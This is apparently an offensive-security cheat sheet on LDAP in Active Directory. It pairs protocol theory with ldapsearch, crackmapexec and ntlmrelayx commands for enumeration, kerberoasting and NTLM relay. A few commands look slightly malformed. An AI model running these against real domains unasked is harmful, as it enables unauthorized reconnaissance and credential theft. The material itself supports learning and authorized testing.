LDAP

Theory

1. What is LDAP? LDAP, or Lightweight Directory Access Protocol, is a widely-used protocol for querying and modifying directory services. It functions as a hierarchical database designed to manage and provide access to various kinds of information, including user accounts, groups, network resources, and more. LDAP operates over TCP/IP, typically on port 389, and can be secured with SSL/TLS as LDAPS (LDAP over SSL) on port 636.

2. LDAP in Active Directory In an Active Directory (AD) environment, LDAP is a fundamental component. AD is a centralized authentication and directory service created by Microsoft. It stores information about users, computers, groups, and other network resources in a hierarchical structure. LDAP serves as the primary means of accessing and modifying this data within AD.

3. LDAP Objects and Attributes LDAP organizes information in the form of objects, each with specific attributes. For instance, a user object might have attributes like 'cn' (common name), 'uid' (user ID), 'memberOf' (group memberships), and more. It is important to focus on identifying objects and their attributes to exploit misconfigurations or vulnerabilities.

4. LDAP Signing involves digitally signing LDAP packets, ensuring the integrity and authenticity of data exchanged between the client and the server. This prevents attackers from tampering with or injecting malicious data into LDAP communications. When LDAP signing is enforced, Domain Controllers will not allow any authentication requests without a valid signature. LDAP signing ensures that the request received by the server (Domain Controller) was sent by the client the LDAP message is purported to be from. Additionally, signing certifies that the LDAP messages are not modified or tampered with. By default, Active Directory does not require LDAP communication to be signed, which can be exploited through relay attack.

5. Channel Binding, on the other hand, enhances security by binding the integrity of the TLS session to the LDAP session. Basically, LDAP channel binding is the act of tying the TLS tunnel and the application layer (leveraged by LDAP) together to create a unique identifier (channel binding token) for that specific LDAP session. This channel binding token (CBT) can only be used within that TLS tunnel and therefore prevents a “stolen” LDAP ticket from being leveraged elsewhere. By default, Active Directory does not require LDAP Channel Binding to be enabled, which can be exploited through relay attack.

Practical Exploitation:

1. Enumeration and Information Gathering: The first step is to enumerate information about the target Active Directory environment. Use the ldapsearch utility to retrieve valuable information:

ldapsearch -x -h <target_IP> -p 389 -s base naming_contexts
ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(objectClass=*)"

python ldapdomaindump.py -u <username> -p <password> <target_IP>

ldeep ldap -u <username> -p <password> -d <target_domain> -s ldap://<DC_IP> 

windapsearch -d <target_domain> -U <username> -P <password> -U 

ntlmrelayx.py -t ldaps://<DC_IP> -

# Keberoasting/ASRepRoasting
cme ldap <DC_IP> -u <username> -p <password> --kerberoasting output.txt

# Delegation
cme ldap <DC_IP> -u <username> -p <password> --trusted-for-delegation

# Check for LDAP Signing 
cme ldap <DC_IP> -u <username> -p <password> -M ldap-checker

# list PKIs/CAs
cme ldap <DC_IP> -u <username> -p <password> -M adcs

# list subnets referenced in AD-SS
cme ldap <DC_IP> -u <username> -p <password> -M subnets

# machine account quota
cme ldap <DC_IP> -u <username> -p <password> -M maq

# users description
cme ldap <DC_IP> -u <username> -p <password> -M get-desc-users

2. Identifying Users and Groups: To identify users and groups, leverage the '(&(objectCategory=person)(objectClass=user))' filter in ldapsearch:

ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(&(objectCategory=person)(objectClass=user))"

3. Exploiting Weak Permissions: Misconfigured permissions can lead to unauthorized access. Identify sensitive objects with overly permissive ACLs (here is an example that searches every account with an SPN set and the attributes AdminCount equal to 1):

ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(|(adminCount=1)(servicePrincipalName=*))"

4. Abusing Privileged Groups Identify users in privileged groups like Domain Admins and exploit their privileges:

ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(&(memberOf=CN=Domain Admins,CN=Users,<base_DN>)(objectClass=user))"

References:

GitHub - dirkjanm/ldapdomaindump: Active Directory information dumper via LDAPGitHub

The Hacker Recipeswww.thehacker.recipes

NTLM Relayhackndo